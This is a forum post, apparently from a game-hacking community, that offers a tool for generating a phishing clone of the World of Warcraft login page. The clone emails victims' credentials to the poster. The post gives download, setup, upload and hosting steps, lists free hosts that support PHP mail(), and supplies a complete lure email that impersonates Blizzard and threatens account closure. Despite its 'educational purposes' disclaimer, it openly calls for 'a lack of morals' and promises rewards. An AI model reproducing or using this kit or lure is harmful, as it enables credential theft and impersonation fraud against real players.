Note 1: This is posted for educational purposes only. I do not advocate phishing in anyway. This is provided to show users how phishing pages could potentially be produced by people with malicious intent, to protect them for falling from such schemes.
Note 2: If you download/use this please post feedback.
Note 3: This program works completely differently to the other page generator.
Hi guys!
This program allows you to enter your email address and it will generate a phishing site (PHP and HTML) identical to the official WoW login page that you can upload to your website. Although the program itself is fairly simplistic, most of the work went into the php mailing etc
How it works:
It takes the offical WoW login page and customises it to send the victim's username and password to you via email. All you need to do is fill in your email into the program, click generate and upload the files and you are ready to go.
What you need:
- A webhost that supports the PHP mail() function. There is a small list at the bottom of this post, and there are many more available on the internet.
- An email address.
- A FTP client (or if you could be bothered (not recommended) manually upload the files through your hosts file upload method)
- A lack of morals
What to do:
- Run the program
- Enter a name for the folder you want the files created in.
- Enter your email address, that the information will be sent to. (Victims can't see this email, it's hidden in the php script)
- Click generate.
- Upload the files in the created folder to a free host.
- Brief overview on how to upload:
Note: It will vary a bit for each host, but heres the overview.
- Register on their site.
- Find the FTP information (host, username, password)
- Enter the information into your ftp client. If you don't have one, I suggest Core FTP LE. It's free and functional. Free FTP client, secure file transfer software
- Upload the contents of the generated folder to your website.
- Link people to that address, and reap the rewards.
Screenshot:
Example of generated page
Virus Scan:
Download Link:
http://www.mediafire.com/file/hjnufwonkme/PGen_v0.1.rar
Here is a sample email you can use to direct people to your website:
(From Moji's post, at http://www.mmowned.com/forums/wow-sc...hing-scam.html, I take no credit for this letter)
Helpful Links:Greetings,
<br><br>
An investigation of your World of Warcraft account has found strong evidence that the account in question is being sold or traded.
As you may not be aware of, this conflicts with Blizzard's EULA under section 4 Paragraph B which can be found here:
<a href=http://www.worldofwarcraft.com/legal/eula.html target="_blank"> WoW -> Legal -> End User License Agreement </a>
<br>
and Section 8 of the Terms of Use found here: <br>
<a href=http://www.worldofwarcraft.com/legal/termsofuse.htmltarget="_blank"> WoW -> Legal -> Terms of Use</a><br><br>
The investigation will be continued by Blizzard administration to determine the action to be taken against your account.
If your account is found violating the EULA and Terms of Use, your account can, and will be suspended/closed/or terminated. <br>
In order to keep this from occurring, you should immediately verify that you are the original owner of the account.
<br><br>
To verify your identity please visit the following webpage: <br>
<a href=YOUR SITE HERE target="_blank">https://www.worldofwarcraft.com/login/login?service=https%3A%2F%2Fwww.worldofwarcraft.com%2Faccount%2Findex.html</a><br>
Only Account Administration will be able to assist with account retrieval issues.
Thank you for your time and attention to this matter, and your continued interest in World of Warcraft. <br>
<br><br>
Sincerely,
<br><br>
Account Administration<br>
Blizzard Entertainment<br>
<a href= Blizzard Support target="_blank">
</a>
Email to advertise your site (Moji): http://www.mmowned.com/forums/wow-sc...hing-scam.html
How to upload files etc. ([Royal]): http://www.mmowned.com/forums/wow-sc...-pictures.html
Some free hosts that support mail() function:
Orgfree.com - Free Web Hosting Area
Free Web Hosting with PHP, MySQL and cPanel, No Ads
Free Web Hosting Area
Note: I have not tried these but they claim to support the function from their page. There are many more you can find on the internet.